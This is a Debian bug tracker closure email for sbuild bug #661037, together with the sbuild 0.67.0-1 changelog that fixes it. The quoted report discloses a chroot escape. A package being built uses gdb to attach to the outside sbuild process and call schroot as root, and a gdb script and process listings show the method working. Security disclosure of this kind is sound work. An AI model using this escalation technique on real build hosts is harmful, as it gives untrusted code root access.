Your message dated Sat, 26 Dec 2015 15:51:44 +0000 with message-id <[email protected]> and subject line Bug#661037: fixed in sbuild 0.67.0-1 has caused the Debian Bug report #661037, regarding process building package can escape from chroot and gain local root to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [email protected] immediately.) -- 661037: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=661037 Debian Bug Tracking System Contact [email protected] with problems
--- Begin Message ---Package: sbuild Version: 0.62.6-1 Severity: important Tags: security When building a package with sbuild, the processes running in the chroot can escape from there and gain local root. This is possible as the processes in- and outside of the chroot environment run under the same user id and the outside process can run commands as root in the chroot environment. To be precise, a malicious package could for example use gdb to attach to the outside process and then execute something along the lines of system("schroot -u root -c [known-chroot-name] [some-command]"). An example package doing so is attached (it needs procps installed in the chroot): ===================================================================== [...] 1001 12772 \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A sbuild-to-root_1.dsc 1001 12779 \_ package log for sbuild-to-root_1_amd64 root 13988 \_ schroot -d /«PKGBUILDDIR» -c unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12 1001 13989 \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b -rfakeroot -j12 1001 14041 \_ /usr/bin/make -f debian/rules build 1001 14042 \_ /usr/bin/perl -w /usr/bin/dh build 1001 14051 \_ /usr/bin/make -f debian/rules override_dh_auto_build 1001 14052 \_ /bin/sh ./sbuild-to-root 1001 14053 \_ ps axfu [...] Will try using 12772... Guessed chroot name: unstable-amd64-sbuild --- gdb-script ----------------------- p system("cd /; schroot -u root -c unstable-amd64-sbuild ps axfu") detach -------------------------------------- [...] 1001 12772 \_ /usr/bin/perl /usr/bin/sbuild -j12 -d unstable -A sbuild-to-root_1.dsc 1001 12779 \_ package log for sbuild-to-root_1_amd64 root 13988 \_ schroot -d /«PKGBUILDDIR» -c unstable-amd64-sbuild-0fda4b02-2706-4743-8931-1c77cac39d9c --run-session -q -u sbuild-user -p -- dpkg-buildpackage -us -uc -b -rfakeroot -j12 1001 13989 | \_ /usr/bin/perl /usr/bin/dpkg-buildpackage -us -uc -b -rfakeroot -j12 1001 14041 | \_ /usr/bin/make -f debian/rules build 1001 14042 | \_ /usr/bin/perl -w /usr/bin/dh build 1001 14051 | \_ /usr/bin/make -f debian/rules override_dh_auto_build 1001 14052 | \_ /bin/sh ./sbuild-to-root 1001 14068 | \_ gdb -batch -x gdb-script /usr/bin/perl 12772 1001 14072 \_ sh -c cd /; schroot -u root -c unstable-amd64-sbuild ps axfu root 14073 \_ schroot -u root -c unstable-amd64-sbuild ps axfu root 14169 \_ /bin/ps axfu [...] ===================================================================== As building untrusted package is not a good idea anyway, I don't think this issue is grave, however it would still be nice if there was an option to run the processes inside the chroot under a different userid. Regards, Ansgar -- System Information: Debian Release: wheezy/sid APT prefers testing APT policy: (500, 'testing'), (100, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 3.2.0-1-amd64 (SMP w/12 CPU cores) Locale: LANG=C, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages sbuild depends on: ii adduser 3.113+nmu1 ii apt-utils 0.8.15.9 ii libsbuild-perl 0.62.6-1 ii perl 5.14.2-7 ii perl-modules 5.14.2-7 Versions of packages sbuild recommends: ii debootstrap 1.0.38 ii fakeroot 1.18.2-1 Versions of packages sbuild suggests: ii deborphan <none> ii wget 1.13.4-2 -- no debconf information
sbuild-to-root_1.tar.gz
Description: GNU Zip compressed data
--- End Message ---
--- Begin Message ---Source: sbuild Source-Version: 0.67.0-1 We believe that the bug you reported is fixed in the latest version of sbuild, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [email protected], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Johannes Schauer <[email protected]> (supplier of updated sbuild package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [email protected]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Format: 1.8 Date: Sat, 26 Dec 2015 15:19:29 +0100 Source: sbuild Binary: libsbuild-perl sbuild buildd Architecture: source Version: 0.67.0-1 Distribution: unstable Urgency: medium Maintainer: Debian buildd-tools Developers <[email protected]> Changed-By: Johannes Schauer <[email protected]> Description: buildd - Daemon for automatically building Debian binary packages from Deb libsbuild-perl - Tool for building Debian binary packages from Debian sources sbuild - Tool for building Debian binary packages from Debian sources Closes: 655215 661037 691539 703814 709270 709864 713033 726866 751732 760832 774351 782534 786456 799056 800317 801436 801798 802678 805063 806931 807488 808290 808560 Changes: sbuild (0.67.0-1) unstable; urgency=medium . * fix Vcs-Browser and Vcs-Git fields to point at the debian/unstable branch (closes: #805063) * add Suggests: libwww-perl to libsbuild-perl because it can optionally make use of LWP::UserAgent (closes: #703814) * new upstream version - ./man/sbuild.1.in: improve documentation of external commands (closes: #802678) - bin/sbuild: add --clean-source and --no-clean-source to allow building a package from an unpacked directory without calling debian/rules clean (closes: #655215) - allow changing the user running dpkg-buildpackage inside the chroot (closes: #661037) - Check architecture wildcard matching with dpkg inside the chroot to avoid situations in which dpkg outside the chroot doesn't know about a new architecture yet (closes: #691539) - lib/Sbuild/Build.pm: say --build instead of incorrect --build-arch (closes: #709270) - bin/sbuild-createchroot: honor --foreign (closes: #709864) - man/sbuild-setup.7.in: correct section 8 for sbuild-createchroot and sbuild-adduser (closes: #713033) - Fix permission of public key (closes: #726866) - sbuild-createchroot: use union-type=overlay for directory chroot and promote tarball chroot in the manpage (closes: #751732) - sbuild-createchroot: run debootstrap with --no-check-gpg if --keyring="" is passed (closes: #760832) - Quit processing when external commands fail (closes: #774351) - bin/sbuild-createchroot: check if chroot already exists before creating a new one (closes: #782534) - Print better message when no chroot is specified (closes: #786456) - Add the --no-arch-any and --arch-any options - Successfully handle a source only build. (Closes: #799056) - lib/Sbuild.pm: improve error message about sbuild group membership (closes: #800317) - bin/sbuild: turn path to input dsc or source directory into an absolute path (closes: #801436) - Set [trusted=yes] for internal dummy repository to make key generation optional (closes: #801798) - have a default for CROSSBUILD_CORE_DEPENDS (closes: #806931) - lib/Sbuild/Chroot.pm: apply environment filter *before* setting environment variables set by sbuild itself (closes: #807488) - lib/Sbuild/ChrootInfo.pm: fix error handling (closes: #808290) - lib/Sbuild/Build.pm: make sure regex only matches lines in the Files field (closes: #808560) * drop all patches which have now been applied upstream Checksums-Sha1: be587e85714ff8782d1cec4755c2f8db20a7c3b4 2236 sbuild_0.67.0-1.dsc 23e53260ad3b714539430738ab93616e27713280 596164 sbuild_0.67.0.orig.tar.gz af9f8f02b0891ef5b1dba57e1eed81b5020b5edc 52212 sbuild_0.67.0-1.debian.tar.xz Checksums-Sha256: 588fa85e62125b0c0c87e6bec63fad1843e7e45d6ec3e0b3143537a25fdcf00a 2236 sbuild_0.67.0-1.dsc e1649b7f2b7faf210ec9b70aa191a9bd5ae5608c671db7a088724734289977c0 596164 sbuild_0.67.0.orig.tar.gz 1d4c446d3df9f198514d201607041a9b05331a25d3e3b11d03c089129e2efbf9 52212 sbuild_0.67.0-1.debian.tar.xz Files: 138b1d6e59a826d6217597fd6aa527e8 2236 devel extra sbuild_0.67.0-1.dsc 36a58b81f0f713f72158c364778fb1ed 596164 devel extra sbuild_0.67.0.orig.tar.gz d077c00fb68ca7d655c98b26719649a3 52212 devel extra sbuild_0.67.0-1.debian.tar.xz -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAEBCAAGBQJWfqJsAAoJEPLLpcePvYPh7uIP/iC/btd89wQlmDegqwblBEO/ 5NsJnNZkt8yxaXLH1t8t7/NM7GxQzllk9pMZ5d8cf690yhlaY3+lPD9t/9AUfh8S g/OvrbW6uvq0nOtdaf0bbLdg8gdsnvToniNPuozduSNLemRfhN/80vfCrbtU/+xW zck/3eLeC0A2e+eJGrfkZrE8kj/fx1DWG8NFy7ZOQZ4dT/TKlB9jzzMfT3o3i4Ht fbMrNA7PDyYBDg5EZZtxjKKSEfRG5y5U+JcS3eJuCG72HnmbLVC/Vg8BOiTe9uad IF5aXzukc9gZFs9nsY1RXU5SCsOsssxXt9l3AYPdfjhfv5uLSHG4WoiLgTiSSylR aSbyEY1w5wbVPcArPsv6x0cgi+P/34vvX0vEMAWIMVA8D2MfoqxUDhHu1uwK+7pg IdDHblL11hwULW3tBBLrayVlMYBbLiFXc2ylDDxdOQ1rEsotYpBcvv/LmhayEaUn oSOYQmwt1/yBuoSXApJ6yZa5a7R6sWqsX6a4mTaK/xYuSR17yyius2nsCtKIP3Nk 7hd3gxfpQo1DGkdBkzYvGvuHFfsGphIBaSDLQKuUA3+VEEdu1s9a1niGaS3u3Wj2 6dEvzluAryAVVjKnPCap7ssGDcp8v9iQKd1duxjzIj1VPVkmM87VZ5KGkSyc00Gk J+JzgjcBINSG31AXqMOp =yAb0 -----END PGP SIGNATURE-----
--- End Message ---
